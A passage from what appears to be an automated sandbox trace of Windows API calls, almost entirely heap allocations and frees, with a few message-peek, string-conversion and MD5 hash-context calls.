cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0135.815] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0135.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0135.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0135.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0135.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0135.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0135.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0135.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0135.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0135.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0135.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0135.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0135.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0135.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0135.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0135.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0135.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0135.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0135.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0135.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0135.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0135.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0135.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0135.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0135.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0135.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0135.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0135.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0135.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0135.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0135.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0135.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0135.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0135.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0135.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0135.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0135.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0135.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0135.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0135.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0135.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0135.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0135.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0135.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0135.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0135.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0135.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0135.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0135.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0135.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0135.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0135.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0135.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0135.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0135.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0135.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0135.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0135.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0135.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0135.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0135.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0135.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0135.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0135.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0135.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0135.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0135.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0135.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0135.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0135.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0135.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0135.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0135.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0135.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0135.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0135.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0135.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0135.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0135.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0135.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0135.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0135.818] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0135.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0135.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0135.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0135.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0135.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0135.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0135.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0135.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0135.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0135.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0135.819] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0135.819] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0135.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0135.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0135.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0135.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0135.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0135.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0135.819] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0135.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0135.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0135.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0135.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0135.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0135.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0135.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0135.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0135.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0135.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0135.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0135.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54df8 [0135.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0135.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0135.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0135.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0135.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0135.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0135.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0135.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0135.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0135.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0135.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0135.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0135.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0135.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0135.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0135.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0135.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0135.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0135.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0135.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0135.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0135.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0135.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0135.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0135.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0135.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0135.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0135.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0135.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0135.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0135.821] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0135.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0135.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0135.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0135.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0135.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0135.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0135.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0135.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0135.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0135.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0135.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0135.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0135.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0135.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0135.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0135.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0135.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d38 [0135.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0135.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0135.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0135.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0135.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0135.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0135.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0135.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0135.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0135.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0135.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0135.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0135.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0135.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0135.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0135.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0135.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0135.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0135.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0135.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0135.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0135.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0135.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0135.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0135.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0135.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0135.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0135.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0135.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0135.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0135.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0135.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0135.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0135.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0135.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54da8 [0135.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0135.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0135.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0135.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0135.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0135.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0135.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0135.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0135.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0135.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0135.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0135.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54db8 [0135.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0135.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0135.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0135.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0135.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0135.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0135.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0135.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0135.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0135.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0135.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0135.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0135.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0135.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0135.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0135.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0135.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0135.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0135.825] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0135.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0135.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0135.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) 